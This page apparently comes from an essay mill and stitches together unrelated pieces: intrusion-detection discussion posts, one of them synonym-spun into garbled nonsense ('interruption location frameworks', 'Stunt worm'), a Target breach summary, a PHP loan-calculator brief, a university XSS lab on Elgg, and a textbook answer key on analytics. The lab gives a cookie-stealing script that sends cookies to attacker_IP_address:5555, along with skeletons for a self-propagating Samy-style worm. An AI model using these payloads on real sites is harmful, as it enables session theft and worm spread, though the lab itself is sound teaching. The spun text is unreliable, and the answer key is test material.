Disussion -1 (Disaster Recover)

Include at least 250 words in your posting and at least 250 words in your reply.  Indicate at least one source or reference in your original post. Please see syllabus for details on submission requirements.
Module 1 Discussion Question

Search “scholar.google.com” for a company, school, or person that has been the target of a network
or system intrusion? What information was targeted? Was the attack successful? If so, what changes
were made to ensure that this vulnerability was controlled? If not, what mechanisms were in-place to protect against the intrusion.

Reply-1(Shravan)

 

Introduction: Interruption location frameworks (IDSs) are programming or equipment frameworks that robotize the way toward observing the occasions happening in a PC framework or system, examining them for indications of security issues. As system assaults have expanded in number and seriousness in the course of recent years, interruption recognition frameworks have turned into an essential expansion to the security foundation of generally associations. This direction archive is planned as a preliminary in interruption recognition, created for the individuals who need to comprehend what security objectives interruption location components serve, how to choose and design interruption discovery frameworks for their particular framework and system situations, how to deal with the yield of interruption identification frameworks, and how to incorporate interruption recognition capacities with whatever remains of the authoritative security foundation. References to other data sources are likewise accommodated the peruse who requires particular or more point by point guidance on particular interruption identification issues.

In the most recent years there has been an expanding enthusiasm for the security of process control and SCADA frameworks. Moreover, ongoing PC assaults, for example, the Stunt worm, host appeared there are gatherings with the inspiration and assets to viably assault control frameworks.

While past work has proposed new security components for control frameworks, few of them have investigated new and in a general sense distinctive research issues for anchoring control frameworks when contrasted with anchoring conventional data innovation (IT) frameworks. Specifically, the complexity of new malware assaulting control frameworks – malware including zero-days assaults, rootkits made for control frameworks, and programming marked by confided in declaration specialists – has demonstrated that it is exceptionally hard to avert and identify these assaults dependent on IT framework data.

In this paper we demonstrate how, by joining information of the physical framework under control, we can distinguish PC assaults that change the conduct of the focused on control framework. By utilizing information of the physical framework we can center around the last goal of the assault, and not on the specific instruments of how vulnerabilities are misused, and how the assault is covered up. We break down the security and well being of our components by investigating the impacts of stealthy assaults, and by guaranteeing that programmed assault reaction instruments won’t drive the framework to a hazardous state.

Conclusion:

paper is to start the dialog among control and security experts – two regions that have had little cooperation previously. We trust that control specialists can use security building to outline – in light of a blend of their prescribed procedures – control calculations that go past wellbeing and adaptation to non-critical failure, and incorporate contemplations to survive focused on assaults.

Reference:

Natasha Gude , Teemu Koponen , Justin Pettit , Ben Pfaff , Martín Casado , Nick McKeown , Scott Shenker, NOX: towards an operating system for networks, ACM SIGCOMM Computer Communication Review, v.38 n.3, July 2008  [doi>10.1145/1384609.1384625]

reply-2(Santhosh)

 

Introduction:

The article (Breach, 2014) explains about the real-world scenarios where there was a network intrusion attack performed by cyber thieves and were successful in stealing financial and customer personal identification information from one of the largest retailer companies, “Target”. The intrusion was a major blow to the company’s security because of the loss of about 110 million user’s sensitive information. Intrusion Kill Chain Framework was used to detect and analyze the type of attack and other critical information. A malware was installed on Target’s point of sales system which transferred the information such as credit/debit cards to a European server. Target’s FireEye malware intrusion detection system sent alerts about the intrusion but negligence from the IT department has created this situation because they did not take any action.

Target’s network and system intrusion:

The malware that was installed on the target’s system has collected about 11 GB of stolen user critical information during target’s busy hours and transferred the data using FTP to Russian based server (Breach, 2014). The access to the Target’s system was gained by stealing credentials from an HVAC and refrigeration company, Fazio Mechanical Services which had a remote connection to the Target’s network. The Kill Chain (Breach, 2014) was used as a cybersecurity tool to detect intrusions related to the network and software. The kill chain system has proposed a solution to the traditional software installation. Traditional software installation assumes that the system is ready to detect and fight intrusion related to network and security. However, the improvised solution proposes that the intrusion detection systems should continuously monitor the logs on the server and other systems to verify if the access is legitimate, if not take immediate action.

Conclusion:

Target breach is one of the biggest security breaches in history. Security vulnerabilities increase with the advancement of the technology which makes the outdated intrusion detection systems to fail to protect from network and system intrusions. The tools like kill chain will help companies to keep the systems secure and locked down.

Reference:
Breach, T. D. (2014). A “Kill Chain” Analysis of the 2013 Target Data Breach.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Using PHP Create A Loan Calculator That Allows For Extra Payments.

Requirements:

  • -Create a page that allows a user to enter loan information; including Loan Amount, Length of Loan (months or years), Annual Interest Rate (percentage), and Extra Payment Amount.
  • -Loan Amount is in dollars. This field is required.
  • -Length of Loan is an integer in months or years. Include a prompt (such as radio buttons or dropdown list) to indicate payment frequency is for months or years. This field is required.
  • -The loan calculation should adjust appropriately based on months or years selection.
  • -Annual Interest Rate should be entered as a percentage. This field is required.
  • -Make sure that all required fields are entered.
  • -Make sure that all entered fields are valid.
  • -Display the results of the loan calculation.
  • -Display the Monthly Payment Amount.
  • -Display the Total Amount to be paid for the loan (principle and interest).
  • -Display the Total Interest to be paid for the loan.
  • -Display an Amortization Schedule for the loan.
  • -Assume the loan starts on the first day of the following month.
  • -In the Amortization Schedule show the Payment Number, Payment Date, Payment Amount, Principle Amount, Interest Amount, Extra Payment Amount (if entered), and Loan Balance.

Extra Credit:

  • -Extra Payment Amount is in dollars and is an additional monthly amount paid towards the principle of the loan. This field is optional.
  • -If Extra Payment Amount is entered, it must be included in the loan calculation.
  • -The Extra Payment Amount should be included as part of the monthly payment.
  • -If Extra Payment Amount is entered, display the Amount of Interest Saved and the Amount of Time Saved.
  • -Store the values entered in cookies and auto populate fields with previous values from cookies.

Hints:

  • -Find a formula to calculate the payment amount.
    • -To use the formula you will need to calculate a few things based on the user input.
    • -You will need to know the number of monthly payments for the loan. Your formula might call this the length of the loan.
    • -You will need to know the interest rate per month.
  • -Now you can start.
  • -Calculate the number of monthly payments.
  • -Calculate the interest rate per month.
  • -Calculate the payment amount.
  • -You should test this by calculating manually on paper and using a php fiddle to test your code calculations.
  • -Compare your results to any online mortgage calculator.
  • -Now use a loop to display each month of the amortization table.
  • -For each month calculate the balance and the portion of the payment that is principal and interest.
  • -For the first month, the balance is the same as the loan amount.
  • -The interest portion of the payment for that month is the balance times the interest rate per month.
  • -The principal portion of the payment for that month is the payment amount minus the interest portion.
  • -The balance for that month is the balance from the previous month minus the principal portion of the payment.
 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Computer Security Questions

Cross-site scripting (XSS) Attacks

 

Cross-site scripting (XSS) is a type of vulnerability commonly found in web applications. This vulnerability makes it possible for attackers to inject malicious code (e.g. JavaScript programs) into victim’s web browser.

Using this malicious code, the attackers can steal the victim’s credentials, such as cookies. The access control policies (i.e., the same origin policy) employed by the browser to protect those credentials can be bypassed by exploiting the XSS vulnerability. Vulnerabilities of this kind can potentially lead to large-scale attacks.

To demonstrate what attackers can do by exploiting XSS vulnerabilities, we have set up a web application named Elgg in our pre-built Ubuntu VM image. Elgg is an open-source web application for social networking, and it has implemented a number of countermeasures to remedy the XSS threat. To demonstrate how XSS attacks work, we have commented out these countermeasures in Elgg in our installation, intentionally making Elgg vulnerable to XSS attacks. Without the countermeasures, users can post any arbitrary message, including JavaScript programs, to the user profiles. In this lab, students need to exploit this vulnerability to launch an XSS attack on the modified Elgg, in a way that is similar to what Samy Kamkar did to MySpace in 2005 through the notorious Samy worm. The ultimate goal of this attack is to spread an XSS worm among the users, such that whoever views an infected user profile will be infected, and whoever is infected will add you (i.e., the attacker) to his/her friend list.

 

Environment setup for the problem:

 

For this problem, we will assume that you have set up the Ubuntu virtual machine environment based on the instructions in the Syllabus under “Special Software Installation Requirements”.

 

We will need the following:

· Firefox web browser

· Apache web server

· Elgg web application

 

For the Firefox browser, we need to use the LiveHTTPHeaders extension for Firefox to inspect the HTTP requests and responses (available under the “Tools” menu in Firefox). The pre-built Ubuntu VM image provided to you has already installed the Firefox web browser with the required extension.

 

The Apache web server is also included in the pre-built Ubuntu image. However, the web server is not started by default. You have to first start the web server using one of the following two commands:

% sudo apache2ctl start

or

% sudo service apache2 start

 

The Elgg web application is already set up in the pre-built Ubuntu VM image. We have also created several user accounts on the Elgg server and the credentials are given below (username, password):

 

admin, seedelgg

alice, seedalice

boby, seedboby

charlie, seedcharlie

samy, seedsamy

 

You can access the Elgg server using the following URL (the Apache server needs to be started first):

http://www.xsslabelgg.com

(this URL is only accessible from inside of the virtual machine, because we have modified the /etc/hosts file to map the domain name (www.xsslabelgg.com) to the virtual machine’s local IP address 127.0.0.1).

 

Once you log in as a user in Elgg, you can access your Profile and list of Friends by clicking on icons in the upper left part of the browser window.

 

Note: Some of the project tasks require some basic familiarity with JavaScript. Wherever necessary, we provide a sample JavaScript program to help you get started.

 

 

i. Posting a Malicious Message to Display an Alert Window

 

The objective of this task is to embed a JavaScript program in your Elgg profile, such that when another user views your profile, the JavaScript program will be executed and an alert window will be displayed. The following JavaScript program will display an alert window:

 

<script>alert(‘XSS’);</script>

 

If you embed the above JavaScript code in your Profile (e.g. in the brief description field), then any user

who views your profile will see the alert window.

 

What you need to do:

1. Login as user Alice and change the “Brief description” field in your Profile such that an alert window which has the following text will open:

XSS attack by <insert your real name/s here>

2. Logout and login as user Boby, and then select user Alice from “More => Members” in the Elgg menu.

3. Include in your project document a screen printout with this alert window.

 

 

ii. Posting a Malicious Message to Display Cookies

 

The objective of this task is to embed a JavaScript program in your Elgg profile, such that when another

user views your profile, the user’s cookies will be displayed in the alert window. This can be done by adding

some additional code to the JavaScript program in the previous task:

 

<script>alert(document.cookie);</script>

Hello Everybody,

Welcome to this message board.

 

 

When a user views this message post, he/she will see a pop-up message box that displays the cookies of the user.

 

 

What you need to do:

1. Login as user Alice and change the “Brief description” field in your Profile such that an alert window which contains the user’s cookies will open.

2. Logout and login as user Charlie, and then select user Alice from “More => Members” in the Elgg menu.

3. Include in your project document a screen printout with this alert window.

 

iii. Stealing Cookies from the Victim’s Machine

 

In the previous task, the malicious JavaScript code can print out the user’s cookies; in this task, the attacker wants the JavaScript code to send the cookies to himself/herself. To achieve this, the malicious JavaScript code needs to send an HTTP request to the attacker, with the cookies appended to the request.

 

We can do this by having the malicious JavaScript code insert an <img> tag with its src attribute set to a

URL on the attacker’s website. When the JavaScript inserts the <img> tag, the browser tries to load the image from the mentioned URL and in the process ends up sending a HTTP GET request to the attacker’s website. The JavaScript given below sends the cookies to port 5555 of the attacker’s machine, where the attacker has a TCP server listening to the same port. The server can print out whatever it receives. The TCP server program is available on the course website.

 

Hello Folks,

<script>document.write(‘<img src=http://attacker_IP_address:5555?c=’ + escape(document.cookie) + ‘ >’); </script>

This script tests an XSS attack.

 

 

 

 

What you need to do:

1. Download, un-compress (it’s a TAR archive, use ‘tar xvf’ to un-compress) and compile the TCP server program (compile using the command make). The server can be found as file echoserv.tar under the Moodle forums post for Project 2. Run this server on port 5555.

2. Login as user Samy and change the “About me” field in your Profile such that the cookies of whoever is viewing Samy’s profile will be sent to the attacker’s TCP server (you need to replace ‘attacker_IP_address’ in the script above with the appropriate value). When editing the “About me” field, select the “Remove editor” option to avoid automatic re-formatting of your text.

3. Logout and login as user Alice, and then view Samy’s profile by selecting user Samy from “More => Members” in the Elgg menu.

4. Include in your project document:

a. a screen printout with the text printed by the TCP server.

b. the JavaScript script you used in step 2 above.

 

 

vi. Writing an XSS Worm

 

In this and next task, we will perform an attack similar to what Samy did to MySpace in 2005 (i.e., the Samy

Worm). First, we will write an XSS worm that does not self-propagate; in the next task, we will make it

self-propagating. From the previous task, we have learned how to steal the cookies from the victim.

 

In this task, we need to write a malicious JavaScript to forge a HTTP request directly from the victim’s browser. This attack does not require the intervention from the attacker. The JavaScript that can achieve this is called a cross-site scripting worm.

 

This task consists of two independent sub-tasks.

 

Subtask: XSS Worm that adds a friend

 

The objective of the attack in this subtask is to modify the victim’s profile and add Samy as a friend of the victim. To add a friend for the victim, we should first find out how a legitimate user adds a friend in Elgg.

More specifically, we need to figure out what is sent to the server when a user adds a friend. Firefox’s

LiveHTTPHeaders extension can help us (available under the “Tools” menu in Firefox); it can display the header and contents of any HTTP request message sent from the browser. From this, we can identify all the parameters in the request.

 

There are two common types of HTTP requests, one is HTTP GET request, and the other is HTTP POST request. These two types of HTTP requests differ in how they send the contents of the request to the server. We can use the JavaScript XMLHttpRequest object to send HTTP GET and POST requests to web applications. XMLHttpRequest can only send HTTP requests back to the server, instead of other computers, because the same-origin policy is strongly enforced for XMLHttpRequest. This is not an issue for us, because we do want to use XMLHttpRequest to send a forged HTTP request back to the Elgg server.

 

To learn how to use XMLHttpRequest, you can study these documents:

https://www.w3schools.com/xml/ajax_xmlhttprequest_create.asp

https://www.w3schools.com/xml/xml_http.asp

https://developer.mozilla.org/en-US/docs/AJAX/Getting_Started

https://www.tutorialspoint.com/ajax/what_is_xmlhttprequest.htm

 

If you are not familiar with JavaScript programming, we suggest that you study the following documents to learn some basic JavaScript functions. You will have to use some of these functions.

Essential Javascript – A Javascript Tutorial:

https://www.evl.uic.edu/luc/bvis546/Essential_Javascript_–_A_Javascript_Tutorial.pdf

 

You may also need to debug your JavaScript code. Firebug is a Firefox extension that helps you debug JavaScript code. It can point you to the precise places that contain errors. FireBug is already installed in Firefox in our pre-built Ubuntu VM image (available under the “Tools” menu in Firefox).

 

For this subtask, the worm program should do the following:

 

1. Create the correct request to add Samy to the friends list of the user who is executing the malicious code

2. Forge a HTTP GET request to add Samy as a friend.

 

Code Skeleton. We provide a skeleton of the JavaScript code that you need to write. This JavaScript code is inserted into user Samy’s profile, and any user that views Samy’s profile will then automatically add Samy as their friend. You need to fill in all the necessary details. When you include the final JavaScript code in the message posted to Samy’s profile, you need to remove all the comments, extra space, and new-line characters.

 

 

<script id=”worm” type=”text/javascript”>

var Ajax=null;

 

//Construct the HTTP request to add Samy as a friend.

var sendurl=”…”;

 

//Create and send Ajax request to add friend.

// The format of the request can be learned from LiveHttpHeaders.

Ajax=new XMLHttpRequest();

Ajax.open(“GET”,sendurl,true);

Ajax.setRequestHeader(“Host”,”www.xsslabelgg.com”);

Ajax.setRequestHeader(“Keep-Alive”,”300″);

Ajax.setRequestHeader(“Connection”,”keep-alive”);

 

// (JavaScript code to access session cookie)

Ajax.setRequestHeader(“Cookie”,document.cookie);

Ajax.setRequestHeader(“Content-Type”,”application/x-www-form-urlencoded”);

Ajax.send();

</script>

 

 

Note that in this case the GET method is used to send the HTTP request.

To modify the victim’s profile, the HTTP request sent by the worm should contain the victim’s __elgg_ts and __elgg_token values in the sendurl variable. These details are present in the web page (right-click and “View Page Source”) and the worm needs to find out and use this information using JavaScript code. The sendurl variable should also contain Samy’s id.

 

What you need to do:

1. Based on the format of the GET request to add a friend, write a JavaScript script that adds Samy to the friends list of any user who views Samy’s profile. Save your JavaScript script in a file task4-1.txt.

2. Login as user Samy and inject in the “About me” field of Samy’s profile the script from file task4-1.txt. (Make sure to select “Remove editor” before editing this field, in order to disable any automatic formatting)

3. Logout and login as user Alice, and then view Samy’s profile by selecting user Samy from “More => Members” in the Elgg menu. At this point, the malicious Javascript script will be executed and Samy will be added to Alice’s friend list.

4. Include in your project document:

a. a screen printout with Alice’s friends list after viewing Samy’s profile.

b. a printout of your JavaScript file task4-1.txt.

5. Include the file task4-1.txt in a ZIP archive and upload this ZIP archive onto the Moodle website for the course.

 

Subtask XSS Worm that changes the victim’s profile

 

The objective of the attack in this subtask is to modify the victim’s profile “About me” field to show the text “Samy is my HERO”. To do this, we should first find out how a legitimate profile change looks like in Elgg. More specifically, we need to figure out what is sent to the server when a user changes the “About me” field and saves her profile. Firefox’s LiveHTTPHeaders extension can help us (available under the “Tools” menu in Firefox); it can display the header and contents of any HTTP request message sent from the browser. From this, we can identify all the needed data in the request.

 

For this subtask, the worm program should do the following:

1. Create the correct request to add a certain piece of text into the profile of a user (the victim) who is viewing Samy’s profile

2. Forge a HTTP POST request to change the profile of the victim user.

 

Code Skeleton. We provide a skeleton of the JavaScript code that you need to write. This JavaScript code is inserted into user Samy’s profile, and any user that views Samy’s profile will then automatically have their “About me” profile field changed to a certain piece of text. You need to fill in all the necessary details. When you include the final JavaScript code in the message posted to Samy’s profile, you need to remove all the comments, extra space, and new-line characters.

 

<script id=”worm” type=”text/javascript”>

var Ajax=null;

 

//Construct the HTTP POST request to modify profile.

var sendurl=”… “;

var content= “…”;

 

//Modify Victim’s profile except for SAMY

if(…)

{

//Create and send Ajax request to modify profile

Ajax=null;

Ajax=new XMLHttpRequest();

Ajax.open(“POST”,sendurl,true);

Ajax.setRequestHeader(“Host”,”www.xsslabelgg.com”);

Ajax.setRequestHeader(“Keep-Alive”,”300″);

Ajax.setRequestHeader(“Connection”,”keep-alive”);

 

// JavaScript code to access session cookie

Ajax.setRequestHeader(“Cookie”,document.cookie);

Ajax.setRequestHeader(“Content-Type”,”application/x-www-form-urlencoded”);

Ajax.send(content);

}

</script>

 

 

Note that in this case the POST method is used to send the HTTP request.

To modify the victim’s profile, the HTTP request sent by the worm should contain certain information about the victim in the HTML body of the request (which is sent via the content variable):

· The __elgg_ts and __elgg_token values are present in the web page (right-click and “View Page Source”) and the worm needs to find out and use this information using JavaScript code.

· The victim’s user name can be obtained using elgg.session.user.name

· The victim’s id (guid) can be obtained using elgg.session.user.guid

 

Important note: Be careful when dealing with an infected profile. If a profile is already infected by the XSS worm, you may want to leave them alone, instead of modifying them again. If you are not careful, you may end up removing the XSS worm from the profile.

 

What you need to do:

1. Based on the format of the POST request to change a user’s profile, write a JavaScript script that changes the “About me” field in the profile of any user (the victim) who views Samy’s profile. The “About me” field should contain the following text:

Samy is my HERO (added by <insert your team member name/s here>

Save your JavaScript script in a file task4-2.txt.

2. Login as user Samy and inject in the “About me” field of Samy’s profile the script from file task4-2.txt. (Make sure to select “Remove editor” before editing this field, in order to disable any automatic formatting)

3. Logout and login as user Alice, and then view Samy’s profile by selecting user Samy from “More => Members” in the Elgg menu. At this point, the malicious Javascript script will be executed and Alice’s profile will be changed.

4. Include in your project document:

a. a screen printout with Alice’s profile after viewing Samy’s profile.

b. a printout of your JavaScript file task4-2.txt.

5. Include the file task4-2.txt in a ZIP archive and upload this ZIP archive onto the Moodle website for the course.

 

v. Writing a Self-Propagating XSS Worm

 

To become a real worm, the malicious JavaScript program should be able to propagate itself. Namely, whenever some people view an infected profile, not only will their profiles be modified, the worm will also be propagated to their profiles, further affecting others who view these newly infected profiles. This way, the more people view the infected profiles, the faster the worm can propagate. This is exactly the same mechanism used by the Samy Worm: within just 20 hours of its October 4, 2005 release, over one million users were affected, making Samy one of the fastest spreading viruses of all time. The JavaScript code that can achieve this is called a self-propagating cross-site scripting worm. In this task, you need to implement such a worm, which infects the victim’s profile.

To achieve self-propagation, when the malicious JavaScript modifies the victim’s profile, it should copy itself to the victim’s profile. If the entire JavaScript program (i.e., the worm) is embedded in the infected profile, to propagate the worm to another profile, the worm code can use DOM APIs to retrieve a copy of itself from the web page. An example of using DOM APIs is given below. This code gets a copy of itself, and display it in an alert window:

 

<script id=worm>

var strCode = document.getElementById(“worm”);

alert(strCode.innerHTML);

</script>

 

 

URL Encoding: All messages transmitted using HTTP over the Internet use URL Encoding, which converts all non-ASCII characters such as space to special code under the URL encoding scheme. In the worm code, messages sent to Elgg should be encoded using URL encoding. The escape function can be used to URL encode a string. An example of using the encode function is given below.

<script>

var strSample = “Hello World”;

var urlEncSample = escape(strSample);

alert(urlEncSample);

</script>

 

Under the URL encoding scheme, the “+” symbol is used to denote space. In JavaScript programs, “+” is used for both arithmetic operations and string concatenation operations. To avoid this ambiguity, you may use the concat function for string concatenation, and avoid using addition. For the worm code in the exercise, you don’t have to use additions. If you do have to add a number (e.g a+5), you can use subtraction (e.g a-(-5)).

 

Other notes:

· To modify the victim’s profile, the HTTP request sent by the worm should contain the following information in the HTML body of the request (which is sent via the content variable):

&accesslevel%5Bdescription%5D=2

(in fact, using the LiveHTTPHeaders extension, you can see this is included in a regular edit profile request)

· Be careful when dealing with an infected profile. If a profile is already infected by the XSS worm, you may want to leave them alone, instead of modifying them again. If you are not careful, you may end up removing the XSS worm from the profile.

 

What you need to do:

1. Based on the format of the POST request to change a user’s profile, write a JavaScript script that changes the “About me” field in the profile of any user (the victim) who views an infected profile. The “About me” field should contain the following text:

Samy is my HERO (added by <insert your team member name/s here>)

Save your JavaScript script in a file task5.txt.

2. Login as user Samy and inject in the “About me” field of Samy’s profile the script from file task5.txt. (Make sure to select “Remove editor” before editing this field, in order to disable any automatic formatting)

3. Logout and login as user Alice, and then view Samy’s profile by selecting user Samy from “More => Members” in the Elgg menu. At this point, the malicious Javascript script will be executed and Alice’s profile will be infected as well.

4. Logout and login as user Boby, and then view Alice’s profile by selecting user Alice from “More => Members” in the Elgg menu. At this point, the malicious Javascript script will be executed and Boby’s profile will be infected as well.

5. Include in your project document:

a. a screen printout with Alice’s profile after viewing Samy’s profile.

b. a screen printout with Boby’s profile after viewing Alice’s profile.

c. A printout of your JavaScript file task5.txt.

6. Include the file task5.txt in a ZIP archive and upload this ZIP archive onto the Moodle website for the course.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

I Need Help In Completing My Task

Sharda_dss11_im_01.doc

image1.png

Chapter 1:

An Overview of Analytics, and AI

Learning Objectives for Chapter 1

· Understand the need for computerized support of managerial decision making

· Understand the development of systems for providing decision-making support

· Recognize the evolution of such computerized support to the current state of analytics/data science and artificial intelligence

· Describe the business intelligence (BI) methodology and concepts

· Understand the different types of analytics and review selected applications

· Understand the basic concepts of artificial intelligence (AI) and see selected applications

· Understand the analytics ecosystem to identify various key players and career opportunities

CHAPTER OVERVIEW

The business environment (climate) is constantly changing, and it is becoming more and more complex. Organizations, both private and public, are under pressures that force them to respond quickly to changing conditions and to be innovative in the way they operate. Such activities require organizations to be agile and to make frequent and quick strategic, tactical, and operational decisions, some of which are very complex. Making such decisions may require considerable amounts of relevant data, information, and knowledge. Processing these in the framework of the needed decisions must be done quickly, frequently in real time, and usually requires some computerized support. As technologies are evolving, many decisions are being automated, leading to a major impact on knowledge work and workers in many ways. This book is about using business analytics and artificial intelligence (AI) as a computerized support portfolio for managerial decision making. It concentrates on the theoretical and conceptual foundations of decision support as well as on the commercial tools and techniques that are available. The book presents the fundamentals of the techniques and the manner in which these systems are constructed and used. We follow an EEE (exposure, experience, and exploration) approach to introducing these topics. The book primarily provides exposure to various analytics/AI techniques and their applications. The idea is that students will be inspired to learn from how various organizations have employed these technologies to make decisions or to gain a competitive edge. We believe that such exposure to what is being accomplished with analytics and that how it can be achieved is the key component of learning about analytics. In describing the techniques, we also give examples of specific software tools that can be used for developing such applications. However, the book is not limited to any one software tool, so students can experience these techniques using any number of available software tools. We hope that this exposure and experience enable and motivate readers to explore the potential of these techniques in their own domain. To facilitate such exploration, we include exercises that direct the reader to Teradata University Network (TUN) and other sites that include team-oriented exercises where appropriate. In our own teaching experience, projects undertaken in the class facilitate such exploration after students have been exposed to the myriad of applications and concepts in the book and they have experienced specific software introduced by the professor. This chapter has the following sections:

CHAPTER OUTLINE

1.1 Opening Vignette: How Intelligent Systems Work for KONE Elevators and Escalators Company

1.2 Changing Business Environments and Evolving Needs for Decision Support and Analytics

1.3 Decision-Making Processes and Computer Decision Support Framework

1.4 Evolution of Computerized Decision Support to Business Intelligence/ Analytics/Data Science

1.5 Analytics Overview

1.6 Analytics Examples in Selected Domains

1.7 Artificial Intelligence Overview

1.8 Convergence of Analytics and AI

1.9 Overview of the Analytics Ecosystem

1.10 Plan of the Book

1.11 Resources, Links, and the Teradata University Network Connection

ANSWERS TO END OF SECTION REVIEW QUESTIONS( ( ( ( ( (

Opening Vignette Questions

1. It is said that KONE is embedding intelligence across its supply chain and enables smarter buildings. Explain.

KONE uses a variety of IoT applications to record and communicate a wide variety of systems status and performance information that can then be used to identify issues and collect important data for future applications.

2. Describe the role of IoT in this case.

IoT allows for the collection of multiple discrete points of data throughout the systems that can be used in a variety of applications.

3. What makes IBM Watson a necessity in this case?

IBM Watson serves to both collect and analyze the wide variety of information presented. It can then communicate this information to other systems and establish patterns based on the data collected.

4. Check IBM Advanced Analytics. What tools were included that relate to this case?

The tools available have many possible applications to the case, specifically the ability to evaluate the data collected across a large number of systems and different parameters.

5. Check IBM cognitive buildings. How do they relate to this case? This solution uses many similar technologies that appears to focus primarily on the ability to detect issues and potential issues within the building.

Section 1.2 Review Questions

1. Why is it difficult to make organizational decisions?

Organizational decisions may be difficult to make due to a complex process necessary to both identify and define the problem as well as evaluate the host of different possible solutions.

2. Describe the major steps in the decision-making process.

· 1.Define the problem (i.e., a decision situation that may deal with some difficulty or with an opportunity).

· 2. Construct a model that describes the real-world problem.

· 3. Identify possible solutions to the modeled problem and evaluate the solutions.

· 4. Compare, choose, and recommend a potential solution to the problem.

3. Describe the major external environments that can impact decision making.

· Political factors. Major decisions may be influenced by both external and internal politics. An example is the 2018 trade war on tariffs.

· Economic factors. These range from competition to the genera and state of the economy. These factors, both in the short and long run, need to be considered.

· Sociological and psychological factors regarding employees and customers. These need to be considered when changes are being made.

· Environment factors. The impact on the physical environment must be assessed in many decision-making situations.

4. What are some of the key system-oriented trends that have fostered IS-supported decision making to a new level?

Computer applications have shifted from merely processing transaction and monitoring activities to actively analyzing and seeking solution to problems through cloud-based systems.

5. List some capabilities of information technologies that can facilitate managerial decision making.

· Group communication and collaboration

· Improved data management.

· Managing giant data warehouses and Big Data

· Analytical support.

· Overcoming cognitive limits in processing and storing information

· Knowledge management.

· Anywhere, anytime support.

Section 1.3 Review Questions

1. List and briefly describe Simon’s four phases of decision making.

Simon’s four phases of decision making are intelligence, design, choice, and implementation.

· Intelligence consists of gathering information by examining reality, then identifying and defining the problem. In this phase problem ownership should also be established.

· Design consists of determining alternatives and evaluating them. If the evaluation will require construction of a model, that is done in this phase as well.

· The choice phase consists of selecting a tentative solution and testing its validity.

· Implementation of the decision consists of putting the selected solution into effect.

2. What is the difference between a problem and its symptoms?

Problems arise out of dissatisfaction with the way things are going. It is the result of a difference or gap between what we desire and what is or is not happening. A symptom is how a problem manifests itself. A familiar personal example is a high temperature (symptom) and an illness (problem). It is necessary to diagnose and treat the underlying illness. Attempting to relieve the temperature works if the illness is one which the body’s defenses can cure, but, can be disastrous in other situations. A business example: high prices (problem) and high unsold inventory level (symptom). Another is quality variance in a product (symptom) and poorly calibrated or worn-out manufacturing equipment (problem).

3. Why is it important to classify a problem?

Classifying a problem enables decision makers to use tools that have been developed to deal with problems in that category, perhaps even including a standard solution approach.

4. Define implementation.

Implementation involves putting a recommended solution to work, but not necessarily implementing a computer system.

5. What are structured, unstructured, and semistructured decisions? Provide two examples of each.

· Structured problem, the procedures for obtaining the best (or at least a good enough) solution are known. Examples would include commonly and historically addressed issues and problems within a business or industry.

· Unstructured decisions are fuzzy, complex problems for which there are no cut-and-dried solution methods. Examples would include issues or problems within a business or industry that combined multiple structured problems or problems where the necessary data or research is not readily available.

· Unstructured problem is one where the articulation of the problem or the solution approach may be unstructured in itself. Examples would include problems within the business or industry where the definition of the problem itself is not agreed upon where the data is not readily available and there may currently exist no ability to collect that data.

6. Define operational control, managerial control, and strategic planning. Provide two examples of each.

· Operational control focuses on the day to day monitoring and control over plans with existing measures and defined actions. Examples may include monitoring Accounts Receivable or controlling inventory.

· Managerial control focuses on short-term control over existing plans where existing actions and measures may be defined, that may also require individual or group decision-making to apply or amend to meet the required result. Examples may include preparing budgets and negotiating contracts.

· Strategic planning focuses on mid and long term planning that directs the core activities and initiatives of the business. Examples may include decisions to make major purchases or conduct research and development.

7. What are the nine cells of the decision framework? Explain what each is for.

The nine cells of the decision framework (see figure 1.2) aligns the three types of decisions (structured, semistructured and unstructured) with the three types of control (operational, managerial and strategic). Each of these cells can provide information about the types of decisions that need to be made based on the availability of information on past decisions or data for decision-making as well as the level of the decision-making involved.

8. How can computers provide support for making structured decisions?

Computers can be instrumental in providing information for structured decisions because they can be used to collect the underlying data needed for the decision as well as providing a known system to abstract analyze and classify possible actions or results.

9. How can computers provide support for making semistructured and unstructured decisions? In these situations, computers can be used to collect the underlying information needed for decision as well as potentially applying some of the learnings from past solutions that may exist. Additionally they may provide the computational ability to conduct a thorough analysis of the identified problem.

Section 1.4 Review Questions

1. List three of the terms that have been predecessors of analytics.

These terms include decision support systems (DSS), executive information systems (EIS) and business intelligence (BI).

2. What was the primary difference between the systems called MIS, DSS, and Executive Information Systems?

The primary differences between the systems are the amount of information available for analysis as well as the sophistication of the display and problem solving capabilities of each.

3. Did DSS evolve into BI or vice versa?

Systems and products referred to as DSS transitioned into the BIA label, although both are content free expressions and mean different things to different professionals.

4. Define BI.

Business intelligence (BI) is an umbrella term that combines architectures, tools, databases, analytical tools, applications, and methodologies.

5. List and describe the major components of BI.

There are three major components to BI:

· the data warehouse environment that organizes summarizes and standardizes business data

· the business analytic environment which uses the data warehouse to access and manipulate data to display results

· the performance and strategy component that utilizes information from the analytic environment to create more detailed analyses and strategy

6. Define OLTP.

Online transaction processing (OLTP) systems handle a company’s routine ongoing business.

7. Define OLAP.

Online analytical processing (OLAP) systems are used to process information and research requests.

8. List some of the implementation topics addressed by Gartner’s report.

The Gartner report proposed splitting planning and executing into four categories; business organization functionality and infrastructure components.

9. List some other success factors of BI. Other success factors may include ease of availability of software and solutions for self-service, integration of DI into the corporate culture and appropriate integration between various BI tools.

Section 1.5 Review Questions

1. Define analytics.

The term replaces terminology referring to individual components of a decision support system with one broad word referring to business intelligence. More precisely, analytics is the process of developing actionable decisions or recommendations for actions based upon insights generated from historical data. Students may also refer to the eight levels of analytics and this simpler descriptive language: “looking at all the data to understand what is happening, what will happen, and how to make the best of it.”

2. What is descriptive analytics? What various tools are employed in descriptive analytics?

Descriptive analytics refers to knowing what is happening in the organization and understanding some underlying trends and causes of such occurrences. Tools used in descriptive analytics include data warehouses and visualization applications.

3. How is descriptive analytics different from traditional reporting?

Descriptive analytics gathers more data, often automatically. It makes results available in real time and allows reports to be customized.

4. What is a DW? How can DW technology help in enabling analytics?

